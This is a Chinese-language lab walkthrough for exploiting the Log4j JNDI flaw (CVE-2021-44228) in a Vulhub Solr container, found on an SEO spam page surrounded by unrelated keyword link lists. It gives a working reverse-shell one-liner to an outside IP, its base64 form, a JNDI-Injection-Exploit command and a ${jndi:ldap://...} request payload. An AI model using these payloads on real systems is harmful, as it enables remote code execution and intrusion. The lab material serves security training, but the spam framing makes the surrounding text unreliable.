当前位置: 首页 > news >正文

php网站用到的知识成都本地推广平台

php网站用到的知识,成都本地推广平台,公司网站建设制作全包,长沙 做网站靶场环境 步骤一:设置出战规则 步骤二:开启靶场 cd vulhub cd log4j cd CVE-2021-44228 docker-compose up -d docker ps 访问端口 靶机开启 步骤三:外带注入 获得dnslog 靶机访问dnslog 得到dnslog的二级域名信息 步骤四:构造…

靶场环境

步骤一:设置出战规则

步骤二:开启靶场

cd vulhub
cd log4j
cd CVE-2021-44228
docker-compose up -d
docker ps

访问端口 靶机开启

步骤三:外带注入

获得dnslog

靶机访问dnslog

得到dnslog的二级域名信息

步骤四:构造恶意类 反弹shell

上传工具

安装java

构造恶意类

反弹shell加密

bash -i >& /dev/tcp/8.155.8.82/520 0>&1YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzUyMCAwPiYx

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzUyMCAwPiYx}|{base64,-d}|{bash,-i}" -A "8.155.8.82"

访问ldamp 出现server.log 再开启本机端口监听

http://8.155.8.82:8983/solr/admin/cores?action=${jndi:ldap://8.155.8.82:1389/7qcpvt}

本机开启监听520端口

再刷新访问ldap 发现监听地址改变 已经从本机监听到了靶机的信息

http://www.yidumall.com/news/22738.html

相关文章:

  • 可信赖的顺的网站建设合肥关键词排名技巧
  • 大唐网站首页百度云官网登录首页
  • b2b免费发布网站大全排名如何规划企业网络推广方案
  • 邯郸网站推广seo页面代码优化
  • 做旅行社网站的提升关键词排名seo软件
  • 灰色网站怎么做seo搜索引擎推广方法
  • 重庆建筑招聘网百度自然排名优化
  • 网站分站如何做福州百度快照优化
  • 怎样创建网站详细步骤发表文章的平台有哪些
  • 微信管理系统后台seo站长工具
  • 网站cms管理后台电话号码优化防控措施
  • seo网站推广是什么如何做网页设计
  • 专业的手机网站开发google play下载安装
  • 公安网站的建设目的百度关键词查询工具
  • 个人名义做网站能备案吗整站优化seo公司哪家好
  • 做设计什么网站平台好点做私活广告软文小故事200字
  • 邢台移动网站建设做推广的软件有哪些
  • 互联网公司薪资待遇搜索引擎的优化方法有哪些
  • 如何让网站长尾关键词有排名上海关键词优化公司哪家好
  • 拖拽做网站在哪里打广告效果最好
  • 宁波seo推广优化哪家强武汉建站优化厂家
  • 网站的首页怎么做的排名公式
  • wordpress破解登录郑州网站优化外包
  • 株洲企业网站制作网店推广的渠道有哪些
  • jsp做网站步骤疫情防控数据
  • 阿里云oss做视频网站百度链接
  • 公司部门网站设计模板下载站长工具关键词挖掘
  • 网站设计的实例小红书推广方案
  • 做国外网站填写价格按人民币写吗网站排名查询
  • 有口碑的宜昌网站建设域名检测工具